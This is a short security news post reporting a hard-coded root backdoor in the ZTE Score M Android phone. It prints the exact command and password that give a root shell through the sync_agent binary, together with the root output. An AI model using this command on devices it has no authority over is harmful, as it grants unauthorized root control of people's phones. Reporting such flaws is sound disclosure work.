Tuesday, June 27, 2017
Home / Tech News / ZTE Android 2.3.4 Gingerbread Backdoored

ZTE Android 2.3.4 Gingerbread Backdoored

Backdoored android gingerbread

The ZTE Score M is an Android 2.3.4 (Gingerbread) phone available in the United States on MetroPCS, made by Chinese telecom ZTE Corporation.

There is a setuid-root application at /system/bin/sync_agent that serves no function besides providing a root shell backdoor on the device.
Just give the magic, hard-coded password to get a root shell:

$ sync_agent ztex1609523
# id
uid=0(root) gid=0(root)

Nice backdoor, ZTE.

twitter backdoor info

Goes to show that no one can be trusted these days, and to always second guess yourself when typing in personal information on phones and the web.

About FastFlux

Owner of ZeroSecurity, interested in programming, malware analysis and penetration testing. If you would like to write for the ZeroSecurity team, please use the contact form above.

Check Also

Megaupload plan to return after 5 years

The huge file-sharing website, Megaupload is scheduled to relaunch, five years after being raided and …